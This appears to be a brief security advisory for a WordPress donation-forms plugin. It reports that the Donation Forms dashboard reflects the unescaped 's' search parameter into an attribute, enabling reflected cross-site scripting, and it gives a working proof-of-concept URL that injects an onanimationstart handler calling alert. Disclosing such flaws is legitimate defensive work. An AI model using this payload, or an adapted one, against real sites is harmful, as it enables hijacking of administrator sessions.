The plugin does not escape the s parameter before outputting it back in an attribute in the Donation Forms dashboard, leading to a Reflected Cross-Site Scripting
https://example.com/wp-admin/edit.php?s="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//&post_status=all&post_type=give_forms&action=-1&start-date&end-date&give-forms-goal-filter=any_goal_status&paged=1&action2=-1